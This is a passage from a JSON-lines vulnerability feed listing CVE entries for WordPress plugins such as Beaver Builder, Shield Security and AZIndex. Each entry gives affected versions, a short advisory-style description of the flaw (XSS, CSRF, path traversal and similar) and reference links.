/id\\\/0bb11092-4367-4f51-9dd7-22fbd655a03f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2494","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5779914a-a168-4835-8aea-e0ab2b3be4f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5779914a-a168-4835-8aea-e0ab2b3be4f6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0992","slug":"wp-simple-firewall","versionImpact":"17.0.17","description":"The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/162dff28-94ea-4a47-a6cb-a13317cf1a04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/162dff28-94ea-4a47-a6cb-a13317cf1a04?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0689","slug":"custom-field-suite","versionImpact":"2.6.4","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0897","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21d1feae-e70f-439d-8992-f136211fdde0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21d1feae-e70f-439d-8992-f136211fdde0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7688","slug":"azindex","versionImpact":"0.8.1","description":"The AZIndex WordPress plugin through 0.8.1 does not have CSRF checks in some places, which could allow attackers to make logged in admin delete arbitrary indexes via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c1d4354-b88b-46ca-b25a-efb9518f4955\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c1d4354-b88b-46ca-b25a-efb9518f4955\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10049","slug":"woo-edit-templates","versionImpact":"1.1.2","description":"The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-edit-templates\\\/trunk\\\/includes\\\/list-table-theme-templates.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-edit-templates\\\/trunk\\\/includes\\\/list-table-theme-templates.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11605","slug":"wp-publications","versionImpact":"1.2","description":"The wp-publications WordPress plugin through 1.2 does not escape filenames before outputting them back in the page, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13627","slug":"wp-touch-slider","versionImpact":"2.2","description":"The OWL Carousel Slider WordPress plugin through 2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7e425a1-ae49-4ea6-abe4-42ba2713af8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7e425a1-ae49-4ea6-abe4-42ba2713af8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1973","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.6.2 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b7a2e4-59f4-4d61-a165-a830ccfb696a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b7a2e4-59f4-4d61-a165-a830ccfb696a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1288","slug":"wooexim","versionImpact":"5.0.0","description":"The WOOEXIM  WordPress plugin through 5.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make an unauthenticated user vulnerable to reflected XSS via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175af35d-6972-42c9-b7ac-913ce1fbac64\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175af35d-6972-42c9-b7ac-913ce1fbac64\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12561","slug":"wecantrack","versionImpact":"1.4.9","description":"The Affiliate Sales in Google Analytics and other tools plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.4.9. This is due to insufficient validation on the redirect url supplied via the 'afflink' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wecantrack\\\/trunk\\\/WecantrackApp.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wecantrack\\\/trunk\\\/WecantrackApp.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b205ab-f042-46d9-a331-f18809477384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b205ab-f042-46d9-a331-f18809477384?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47447","slug":"wp-advanced-search","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mathieu Chartier WordPress WP-Advanced-Search plugin <=\u00a03.3.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-advanced-search\\\/wordpress-wp-advanced-search-plugin-3-3-8-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-advanced-search\\\/wordpress-wp-advanced-search-plugin-3-3-8-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0832","slug":"under-construction-page","versionImpact":"3.96","description":"The Under Construction plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.96. This is due to missing or incorrect nonce validation on the install_weglot function called via the admin_action_install_weglot action. This makes it possible for unauthenticated attackers to perform an unauthorized install of the Weglot Translate plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L2389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L2389\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa84388-3597-4a54-9ae8-d6e04afe9061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa84388-3597-4a54-9ae8-d6e04afe9061?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22672","slug":"vslider","versionImpact":"4.1.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mr.Vibe vSlider Multi Image Slider for WordPress plugin <=\u00a04.1.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1586","slug":"schema-and-structured-data-for-wp","versionImpact":"1.26","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom schema in all versions up to, and including, 1.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default the required authentication level is admin, but administrators have the ability to assign role based access to users as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0896","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/button\\\/includes\\\/frontend.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/button\\\/includes\\\/frontend.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7687","slug":"azindex","versionImpact":"0.8.1","description":"The AZIndex WordPress plugin through 0.8.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b861f18a-40ae-4989-a8e4-37df1771ae23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b861f18a-40ae-4989-a8e4-37df1771ae23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10040","slug":"infinite-scroll","versionImpact":"2.6.2","description":"The Infinite-Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation on the process_ajax_edit and process_ajax_delete function. This makes it possible for unauthenticated attackers to make changes to plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L252\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L252\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L275\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13694","slug":"smart-wishlist-for-more-convert","versionImpact":"1.8.7","description":"The WooCommerce Wishlist (High customization, fast setup,Free Elementor Wishlist, most features) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.8.7 via the download_pdf_file() function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to extract data from wishlists that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-form-handler.php#L607\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-form-handler.php#L607\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-wishlist.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-wishlist.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229758\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229758\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-wishlist-for-more-convert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-wishlist-for-more-convert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59fe7630-ab94-419f-aca5-39b74d86ae4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59fe7630-ab94-419f-aca5-39b74d86ae4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13626","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) WordPress plugin through 3.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/511c6e7a-087f-41ef-9009-2525f332f8c6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/511c6e7a-087f-41ef-9009-2525f332f8c6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1972","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d443c70-6537-4c6d-a282-12d392f0f558?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d443c70-6537-4c6d-a282-12d392f0f558?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1286","slug":"download-html-tinymce-button","versionImpact":"1.2","description":"The Download HTML TinyMCE Button WordPress plugin through 1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42556c7-09b6-49ae-9f87-cbaf16e7c280\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c42556c7-09b6-49ae-9f87-cbaf16e7c280\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1400","slug":"modern-events-calendar-lite","versionImpact":"5.16.2","description":"The Modern Events Calendar Lite WordPress plugin through 5.16.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7feceef-28f1-4cac-b124-4b95e3f17b07\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7feceef-28f1-4cac-b124-4b95e3f17b07\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0831","slug":"under-construction-page","versionImpact":"3.96","description":"The Under Construction plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.96. This is due to missing or incorrect nonce validation on the dismiss_notice function called via the admin_action_ucp_dismiss_notice action. This makes it possible for unauthenticated attackers to dismiss plugin notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L901\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L901\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/031a1203-6b0d-453b-be8a-12e7f55cb401?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/031a1203-6b0d-453b-be8a-12e7f55cb401?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1570","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's login-password shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/LoginFormBuilder.php#L99\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/src\\\/ShortcodeParser\\\/Builder\\\/LoginFormBuilder.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\